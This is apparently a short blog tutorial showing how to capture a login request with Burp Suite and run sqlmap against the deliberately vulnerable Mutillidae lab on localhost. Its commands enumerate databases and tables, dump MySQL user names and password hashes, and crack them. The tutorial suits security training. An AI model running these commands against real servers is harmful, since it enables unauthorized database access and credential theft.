Extract Data from Database Server via SQL Injection with SQL Map

Posted by shinigami at 07:02 Read our previous post

Mutillidae have a bug for SQL Injection, so I will use  this bug for extracting data from database.
Now open your burp suite and open Mutillidae from your browser.

http://localhost/mutillidae/index.php?page=login.php

Enter a random Name and Password. Burp Suite will capture all data in Mutillidae look like this,

The data you needed is data in the red line. Copy this data, and open your SQL Map.
enter this command :

./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" --dbs

The blue string is a data from burp suite. Press enter and you will see the database.

I want to see the tables on database mysql, so run this command:

./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" --tables

The blue string is a database what you want to open.

Now I will see the user column from database mysql. Simply run this command:

./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" -T "user" --columns

The blue string is a column name.

Now I will see the value of user column and value of user password from database mysql. Simply run this command:

./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" -T "user" -C "user" --dump

./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" -T "user" -C "password" --dump

After running the command above, SQL Map automated to crack the hash password of mysql. When the prompt to crack hash mysql appear, please answer Y and press enter.

Ok, we Got the Data (username,password) MySQL